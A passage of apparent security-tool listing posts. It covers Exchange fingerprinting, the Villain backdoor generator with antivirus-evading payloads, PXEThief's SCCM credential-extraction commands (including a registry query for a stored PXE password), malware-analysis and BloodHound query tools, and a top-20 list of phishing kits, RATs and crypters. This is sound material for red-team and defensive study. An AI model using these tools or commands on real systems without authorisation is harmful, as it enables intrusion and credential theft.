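As a loose analogy for the hooking idea described above, the Python snippet below wraps a target function so that every call is logged before the original is invoked and its return value is handed back to the caller. It is only a conceptual sketch; DotDumper's managed hooks patch the compiled function in memory rather than reassigning attributes, and none of this code is taken from the tool.

import base64

def install_hook(module, name):
    # Replace module.<name> with a wrapper that logs arguments and the return value
    original = getattr(module, name)

    def hook(*args, **kwargs):
        print(f"[hook] {name} called with args={args!r} kwargs={kwargs!r}")
        result = original(*args, **kwargs)   # optionally call the original function
        print(f"[hook] {name} returned {result!r}")
        return result                        # hand execution back to the caller

    setattr(module, name, hook)

# Example: log every call to base64.b64decode, analogous to hooking Assembly.Load
install_hook(base64, "b64decode")
base64.b64decode(b"aGVsbG8=")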

Easily extendible

Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the tool's improvement.

Differences with known tooling

With the goal and features of DotDumper clear, it might seem as if there's overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool better than another, but rather to show how the tools differ.

DotDumper's goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the code's readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.

Future work

DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to the injection of hooks into the DotNet Framework's functions, which can be subject to change, it is entirely possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who would rather not publicly interact, feel free to send me a private message on my Twitter.

Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! There's nothing like hearing about the usage of a home-made tool!

There is more in store for DotDumper, and an update will be sent out to the community once it is available!



ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Microsoft Exchange instances for a given domain based on the top common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange servers, then it will send a couple of HTTP requests and parse the content of the response sent by the server to identify whether it is running Microsoft Exchange or not.

Currently, the tool has a signature for every version of Microsoft Exchange from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the X-OWA-Version header it can identify the exact version.
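As a rough illustration of that check, the snippet below requests the OWA logon page of a host and prints the X-OWA-Version header if it is present. The host name is hypothetical, and mapping the reported build number to an exact product version requires a signature table such as the one ExchangeFinder ships; this is not the tool's actual code.

import requests

# Hypothetical host; ExchangeFinder derives candidates such as mail.<domain> and autodiscover.<domain>
url = "https://mail.example.com/owa/"

response = requests.get(url, timeout=10, verify=False, allow_redirects=True)

build = response.headers.get("X-OWA-Version")
if build:
    print(f"Exchange build reported by OWA: {build}")   # still needs a build-to-version lookup
else:
    print("No X-OWA-Version header; the host may not expose OWA or may hide the build")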

If the tool found a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ poetry install 1 ⨯
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

• Installing pyparsing (3.0.9)
• Installing attrs (22.1.0)
• Installing certifi (2022.6.15)
• Installing charset-normalizer (2.1.1)
• Installing idna (3.3)
• Installing more-itertools (8.14.0)
• Installing packaging (21.3)
• Installing pluggy (0.13.1)
• Installing py (1.11.0)
• Installing urllib3 (1.26.12)
• Installing wcwidth (0.2.5)
• Installing dnspython (2.2.1)
• Installing pytest (5.4.3)
• Installing requests (2.28.1)
• Installing termcolor (1.1.0)
Installing the current project: ExchangeFinder (0.1.0)

┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]

┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan single domain you can use the option --domain like the following:

askar•/opt/redteaming/ExchangeFinder(main⚡)» python3 exchangefinder.py --domain dummyexchangetarget.com


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexchangetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askar•/opt/redteaming/ExchangeFinder(main⚡)»

Scan multiple domains

To scan multiple domains (targets) you can use the option --domains and choose a file like the following:

askar•/opt/redteaming/ExchangeFinder(main⚡)» python3 exchangefinder.py --domains domains.txt


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records found for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askar•/opt/redteaming/ExchangeFinder(main⚡)»

Please note that the examples used in the screenshots are resolved in the lab only

This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances; feel free to open a PR if you find any issue or have something new to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted, using the recipient sibling server's ID as the encryption key and the first 16 bytes of the local server's ID as the IV (a hedged sketch of this kind of scheme follows this list). During the initial connection handshake of two sibling servers, each server's ID is exchanged in clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure, as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough.
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.
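To make point 3 above more concrete, here is a minimal sketch of that kind of scheme using PyCryptodome: AES-CBC keyed with the recipient sibling's ID and using the first 16 bytes of the local server's ID as the IV. The IDs, key size, mode, and padding below are assumptions for illustration only, not Villain's actual implementation.

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

# Hypothetical sibling-server IDs; Villain's real IDs and key handling may differ
recipient_id = "b1946ac92492d2347c6235b4d2611184"   # 32 characters, used here as a 32-byte key
local_id = "591785b794601e212b260e25925636fd"

key = recipient_id.encode()     # assumption: the recipient ID's raw bytes act as the AES key
iv = local_id.encode()[:16]     # first 16 bytes of the local server's ID as the IV

def encrypt(plaintext: bytes) -> bytes:
    return AES.new(key, AES.MODE_CBC, iv).encrypt(pad(plaintext, AES.block_size))

def decrypt(ciphertext: bytes) -> bytes:
    return unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext), AES.block_size)

blob = encrypt(b"sibling command: sessions")
print(decrypt(blob))   # b'sibling command: sessions'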

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell Constrained Language Mode.
  • The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It has nothing to do with how good or bad an idea is; it's just too much work and, also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collection Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly over permissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1 it will attempt to use the interface that can reach the machine's default GW as output interface. If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific interface with 'manual_interface_selection_by_id' (see the short Scapy sketch after this list).
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.
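If you want to see that interface table outside of PXEThief (pxethief.py 10 prints it for you), recent Scapy versions expose it directly; the short snippet below prints the table and the interface Scapy would pick by default. This is generic Scapy usage shown for convenience, not PXEThief code.

from scapy.all import conf

# Print Scapy's interface table; the index column is what
# 'manual_interface_selection_by_id' in settings.ini expects
conf.ifaces.show()

# The interface Scapy would use by default (automatic selection behaves similarly)
print("Default interface:", conf.iface)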

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one, if it is not correct, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework


Subparse is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine, all before indexing the information parsed into an Elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 default parsing modules (ELFParser, OLEParser and PEParser) and 4 enrichment modules (ABUSEEnricher, CAPEEnricher, STRINGEnricher and YARAEnricher).


Getting Started

Software Requirements

To get started using Subparse there are a few required/recommended programs that need to be installed and set up before trying to work with our software.

Software Status Link
Docker Required Installation Guide
Python3.8.1 Required Installation Guide
Pyenv Recommended Installation Guide

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.


Python Requirements
Python requires some other packages to be installed that Subparse depends on for its processes. To complete the Python setup, navigate to the location of your Subparse installation and go to the *parser* folder. Then install the Python requirements with the following commands:
sudo apt-get install build-essential
pip3 install -r ./requirements.txt

Docker Requirements
Since Subparse uses Docker for its backend and web interface, the Docker containers need to be set up before the program can be used. To do this, navigate to the root directory of the Subparse installation location and use the following command to set up the Docker instances:
docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.


Installation steps


Usage

Command Line Options

Command line options that are available for subparse/parser/subparse.py:

Argument Alternative Required Description
-h --help No Shows help menu
-d SAMPLES_DIR --directory SAMPLES_DIR Yes Directory of samples to parse
-e ENRICHER_MODULES --enrichers ENRICHER_MODULES No Enricher modules to use for additional parsing
-r --reset No Reset/delete all data in the configured Elasticsearch cluster
-v --verbose No Display verbose commandline output
-s --service-mode No Enters service mode, allowing for more samples to be added to the SAMPLES_DIR while processing

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.


General Information Collected

Before any parser is executed, general information is collected about the sample regardless of the underlying file type (a short collection sketch follows the list below). This information includes:

  • MD5 hash of the sample
  • SHA256 hash of the sample
  • Sample name
  • Sample size
  • Extension of sample
  • Derived extension of sample
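As referenced above, a minimal sketch of gathering this type-independent metadata might look like the following. It only illustrates the fields listed; it is not Subparse's collection code, and the derived-extension logic in particular is reduced to a crude magic-bytes guess.

import hashlib
import os

def general_info(path: str) -> dict:
    with open(path, "rb") as handle:
        data = handle.read()
    name = os.path.basename(path)
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "name": name,
        "size": len(data),
        "extension": os.path.splitext(name)[1].lstrip("."),
        # crude stand-in for the derived extension: guess from magic bytes
        "derived_extension": "exe" if data[:2] == b"MZ" else ("elf" if data[:4] == b"\x7fELF" else "unknown"),
    }

print(general_info("samples/suspicious.bin"))   # hypothetical sample path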

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them, because the file type corresponds to those the PEParser is able to examine.

Default Modules


ELFParser
This is the default parsing module that will be executed against ELF files. Information that is collected:
  • General Information
  • Program Headers
  • Section Headers
  • Notes
  • Architecture Specific Data
  • Version Information
  • Arm Unwind Information
  • Relocation Data
  • Dynamic Tags

OLEParser
This is the default parsing module that will be executed against OLE and RTF formatted files, this uses the OLETools package to obtain data. The information that is collected:
  • Meta Data
  • MRaptor
  • RTF
  • Times
  • Indicators
  • VBA / VBA Macros
  • OLE Objects

PEParser
This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
  • Section code and count
  • Entry point
  • Image base
  • Signature
  • Imports
  • Exports


Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules


ABUSEEnricher
This enricher uses the [Abuse.ch](https://abuse.ch/) API and [Malware Bazaar](https://bazaar.abuse.ch) to collect more information about the sample(s) Subparse is analyzing; the information is then aggregated and stored in the Elastic database.
CAPEEnricher
This enricher is used to communicate with a CAPEv2 sandbox instance to collect more information about the sample(s) through dynamic analysis; the information is then aggregated and stored in the Elastic database, utilizing the Kafka messaging service for background processing.
STRINGEnricher
This enricher is a smart string enricher that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments.
YARAEnricher
This enricher uses a pre-compiled YARA file located at parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and the YaraRulesProject.


Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.

Note: The naming conventions for both class and file names must be strictly adhered to; this is the first thing to check if your custom Parser/Enricher is not being executed. Your Parser/Enricher must use the same name across all of its files and class names.



Logging

The logger object is a singleton implementation of the default Python logger. For in-depth usage, please reference the official documentation. For Subparse, the only logging methods we recommend using are the logging levels for output (a short usage sketch follows this list). These are:

  • debug
  • warning
  • error
  • critical
  • exception
  • log
  • info
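A minimal sketch of how those levels are used with a standard Python logger; the logger name and messages are assumptions for illustration, not Subparse's exact object:

import logging

# A module-level logger behaves like a singleton: repeated getLogger("subparse")
# calls return the same object.
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger("subparse")

logger.debug("starting parser run")
logger.info("collected general information")
logger.warning("enricher skipped: no API key configured")
try:
    raise ValueError("example failure")
except ValueError:
    logger.exception("parser raised an exception")   # logs at ERROR level with traceback
logger.critical("unable to reach the Elastic database")
logger.log(logging.INFO, "explicit level via log()")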


ACKNOWLEDGEMENTS

  • This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.


Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools can parse exported JSON graphs, I need graph results in a line-by-line .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams reveal detailed information about their Active Directory environments.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers to date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export is just the end object, ready to be used as a target list with other tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
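For context, each cypher the tool wraps is an ordinary Neo4j query over the BloodHound schema. Below is a minimal sketch of running one such query with the official neo4j Python driver; the URI, credentials, and query are illustrative assumptions, not one of cypherhound's built-in cyphers:

from neo4j import GraphDatabase  # pip install neo4j

URI = "bolt://localhost:7687"          # default Neo4j URI, as noted under Important Notes
AUTH = ("neo4j", "neo4j_password")     # placeholder credentials

# Illustrative BloodHound-style cypher: groups a given user belongs to (directly or nested).
QUERY = """
MATCH (u:User {name: $user})-[:MemberOf*1..]->(g:Group)
RETURN DISTINCT g.name AS group
"""

driver = GraphDatabase.driver(URI, auth=AUTH)
with driver.session() as session:
    for record in session.run(QUERY, user="SVC-TEST@DOMAIN.LOCAL"):
        print(record["group"])
driver.close()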

Commands

The full command menu is shown below:

Command Menu
set - used to set search parameters for cyphers; double/single quotes are not required for any sub-commands
  sub-commands
    user - the user to use in user-specific cyphers (MUST include @domain.name)
    group - the group to use in group-specific cyphers (MUST include @domain.name)
    computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
    regex - the regex to use in regex-specific cyphers
  examples
    set user svc-test@domain.local
    set group domain admins@domain.local
    set computer dc01.domain.local
    set regex .*((?i)web).*
run - used to run cyphers
  parameters
    cypher number - the number of the cypher to run
  example
    run 7
export - used to export cypher results to txt files
  parameters
    cypher number - the number of the cypher to run and then export
    output filename - the name of the output file, extension not needed
    raw - write raw output instead of just the end object (optional)
  examples
    export 31 results
    export 42 results2 raw
list - used to show a list of cyphers
  parameters
    list type - the type of cyphers to list (general, user, group, computer, regex, all)
  examples
    list general
    list user
    list group
    list computer
    list regex
    list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0; certain edges will not work with previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest-path exports are identical whether or not raw is specified, due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you open and, where applicable, include output.



Top 20 Most Popular Hacking Tools in 2022


As in previous years, we have put together a ranking of the most popular tools published between January and December 2022.

The tools cover topics such as Phishing, Information Gathering, and Automation, among others.

Without further ado, here is our list of the most popular tools on KitPloit in 2022:


  1. Zphisher - Automated Phishing Tool


  2. CiLocks - Android LockScreen Bypass


  3. Arkhota - A Web Brute Forcer For Android


  4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints


  5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING


  6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features


  7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


  8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device


  9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool


  10. HackingTool - ALL IN ONE Hacking Tool For Hackers


  11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


  12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words


  13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  14. BITB - Browser In The Browser (BITB) Templates


  15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks


  16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures


  17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  18. Grafiki - Threat Hunting Tool About Sysmon And Graphs


  19. VLANPWN - VLAN Attacks Toolkit


  20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks





The KitPloit team wishes you a Happy New Year!


Aftermath - A Free macOS IR Framework


Aftermath is a Swift-based, open-source incident response framework.

Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.

